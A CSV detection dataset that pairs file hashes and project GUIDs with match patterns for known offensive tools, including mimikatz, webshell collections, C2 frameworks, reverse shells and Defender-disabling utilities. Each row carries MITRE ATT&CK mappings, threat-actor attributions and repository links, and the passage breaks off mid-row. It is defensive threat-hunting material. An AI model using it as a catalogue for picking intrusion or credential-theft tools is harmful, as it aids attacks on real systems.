"*62971b70cd61bff1243ad58121912ea8aa7ee1cfb553b2310cbbd4c32529e151*",".{0,1000}62971b70cd61bff1243ad58121912ea8aa7ee1cfb553b2310cbbd4c32529e151.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","27841" "*6298ad100c27577260513c1e8045443ee1630de94b2aee6f0339d25e91ad6186*",".{0,1000}6298ad100c27577260513c1e8045443ee1630de94b2aee6f0339d25e91ad6186.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - 
T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27842" "*6299009a4d05609f3960b17f3714579cd3fa4e85c2dbab240672301884fd89d5*",".{0,1000}6299009a4d05609f3960b17f3714579cd3fa4e85c2dbab240672301884fd89d5.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","27843" "*62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3*",".{0,1000}62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27845" 
"*62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3*",".{0,1000}62a32ce26d8954a32e41cb222e6c2fab2e25b3b99d7567a051a3875a0d5ee7e3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27846" "*62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd*",".{0,1000}62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","27847" 
"*62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9*",".{0,1000}62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","27848" "*62b0e8dc11a981b51b71c3225f8720e33bbe39d65030fa99d1a015c1a1f7c891*",".{0,1000}62b0e8dc11a981b51b71c3225f8720e33bbe39d65030fa99d1a015c1a1f7c891.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27849" "*62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad*",".{0,1000}62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27850" "*62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad*",".{0,1000}62b621ead9dd3cc8af73904727d15e469ce06968d274217ac7002fa2f806d8ad.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - 
Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27851" "*62b639364b226613a7dd3b9ee696a5c52ceef41f66d313cca9ae5e6b3f691bc6*",".{0,1000}62b639364b226613a7dd3b9ee696a5c52ceef41f66d313cca9ae5e6b3f691bc6.{0,1000}","offensive_tool_keyword","POC","CVE-2020-3952 POC exploitation","T1190 - T1040 - T1059.001","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/guardicore/vmware_vcenter_cve_2020_3952","1","0","#filehash","N/A","7","3","273","60","2020-04-16T08:38:42Z","2020-04-16T07:40:51Z","27852" "*62B6EF3C-3180-4730-A2CE-82D27C43A5B2*",".{0,1000}62B6EF3C\-3180\-4730\-A2CE\-82D27C43A5B2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","27853" "*62b7eff31d339fd04e6d39aba47b5f37b1b6feb27f85c3c71e4d2d600e8142c6*",".{0,1000}62b7eff31d339fd04e6d39aba47b5f37b1b6feb27f85c3c71e4d2d600e8142c6.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","27855" "*62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318*",".{0,1000}62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27856" "*62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6*",".{0,1000}62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","27858" "*62c2a21006b98e0d124c262372b96eb10f15dc140b5cddfd513454795c55c47f*",".{0,1000}62c2a21006b98e0d124c262372b96eb10f15dc140b5cddfd513454795c55c47f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27859" "*62cca262256335868ec743989fd6afb8d53d51870abe9a0ef12413a82719f29d*",".{0,1000}62cca262256335868ec743989fd6afb8d53d51870abe9a0ef12413a82719f29d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27860" "*62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872*",".{0,1000}62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27861" "*62d8159fd6c2b3dc8175e8bfab36369917530bca9ae2bb2e12bf5d18fbdf9896*",".{0,1000}62d8159fd6c2b3dc8175e8bfab36369917530bca9ae2bb2e12bf5d18fbdf9896.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","27863" "*62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301*",".{0,1000}62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","#filehash","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","27864" "*62E3CCF4-07F3-496E-B77D-48D5AC0E6260*",".{0,1000}62E3CCF4\-07F3\-496E\-B77D\-48D5AC0E6260.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","27866" 
"*62e4454e30b5238083722ab887d43c7e522a9ace13f1e62bf1618b717b80938c*",".{0,1000}62e4454e30b5238083722ab887d43c7e522a9ace13f1e62bf1618b717b80938c.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27867" "*62e779d3d44b32644b427335bb091880b637ed5dd3c01ec2ecd9c732a5d17539*",".{0,1000}62e779d3d44b32644b427335bb091880b637ed5dd3c01ec2ecd9c732a5d17539.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","27869" "*62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df*",".{0,1000}62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","#filehash","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","27870" "*62eed3bd13a07c779ba809b4ba237a1e1e8c882f9f62bb9fcf87199213cb8824*",".{0,1000}62eed3bd13a07c779ba809b4ba237a1e1e8c882f9f62bb9fcf87199213cb8824.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27872" "*62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca*",".{0,1000}62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","27873" "*62f733a63d38061d5768057eccce85a23d4c22748cdb5b80b9a12ffc18cc976a*",".{0,1000}62f733a63d38061d5768057eccce85a23d4c22748cdb5b80b9a12ffc18cc976a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27874" "*62f8b7689b4e41dd4035f0583ec04493d41f783e7d8152bb4dd4196e3bbc7cf5*",".{0,1000}62f8b7689b4e41dd4035f0583ec04493d41f783e7d8152bb4dd4196e3bbc7cf5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27875" "*6302105A-80BB-4987-82EC-95973911238B*",".{0,1000}6302105A\-80BB\-4987\-82EC\-95973911238B.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27878" "*63033e3b8e698bba85b87ca2b199e9c3e7da9d046782343ac0eccab4beef8441*",".{0,1000}63033e3b8e698bba85b87ca2b199e9c3e7da9d046782343ac0eccab4beef8441.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27879" "*6308bf4ba359c23171ea4efc92a5bc51bf3b52f79efc14ea99c5d6454eacc099*",".{0,1000}6308bf4ba359c23171ea4efc92a5bc51bf3b52f79efc14ea99c5d6454eacc099.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27881" "*630BF262-768C-4085-89B1-9FEF7375F442*",".{0,1000}630BF262\-768C\-4085\-89B1\-9FEF7375F442.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27882" "*630cf7ac06f7286e926cfaf1b2ca5105a7caaee6627837da5f71d5b44302f992*",".{0,1000}630cf7ac06f7286e926cfaf1b2ca5105a7caaee6627837da5f71d5b44302f992.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","27883" "*63109331510d0f6d9baf8b41017b9187c80f2ff24b426750a1f7f3fe8e82d00e*",".{0,1000}63109331510d0f6d9baf8b41017b9187c80f2ff24b426750a1f7f3fe8e82d00e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27885" "*6315ca3522a2846e520579222af0ef4ae8db9d9f94046e9ea507bb7a22d81b6f*",".{0,1000}6315ca3522a2846e520579222af0ef4ae8db9d9f94046e9ea507bb7a22d81b6f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27886" "*63184d644922cc6b2c7cf8c1059485d5de726bd2d5e6538bfcdbec841818ca87*",".{0,1000}63184d644922cc6b2c7cf8c1059485d5de726bd2d5e6538bfcdbec841818ca87.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense 
Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","27887" "*631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255*",".{0,1000}631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27888" "*632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d*",".{0,1000}632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27889" "*633009bda2a3aea268272f19eadf91df366d38bf84e76d56b9e598886d909fbe*",".{0,1000}633009bda2a3aea268272f19eadf91df366d38bf84e76d56b9e598886d909fbe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27891" "*6332b66bf0be1e9c829515ae2ab3104e12d786263d283a512e756f561782c0f0*",".{0,1000}6332b66bf0be1e9c829515ae2ab3104e12d786263d283a512e756f561782c0f0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27892" "*6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339*",".{0,1000}6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#filehash","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","27893" "*6339e33836fd201a43b6cf193789135c21b9cb8d3de526b6b91540991f42c51d*",".{0,1000}6339e33836fd201a43b6cf193789135c21b9cb8d3de526b6b91540991f42c51d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27894" "*633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb*",".{0,1000}633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27896" 
"*633d4692872611822975590e70d341e38eb6bb4f97c3a3e61f501193c1c5a101*",".{0,1000}633d4692872611822975590e70d341e38eb6bb4f97c3a3e61f501193c1c5a101.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27897" "*63518ea48a4b0bd7a3750f6c67948316800e284ce9951e6901bacf8fdbb4dd07*",".{0,1000}63518ea48a4b0bd7a3750f6c67948316800e284ce9951e6901bacf8fdbb4dd07.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27898" "*635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea*",".{0,1000}635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27899" "*6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1*",".{0,1000}6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a 
honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27900" "*63583c53c98e8ce473102325800fa6c9fe7ea1bc5be5d472052a279ce0015ad0*",".{0,1000}63583c53c98e8ce473102325800fa6c9fe7ea1bc5be5d472052a279ce0015ad0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27901" "*635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27*",".{0,1000}635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27903" "*63688c4f211155c76f2948ba21ebaf83*",".{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application 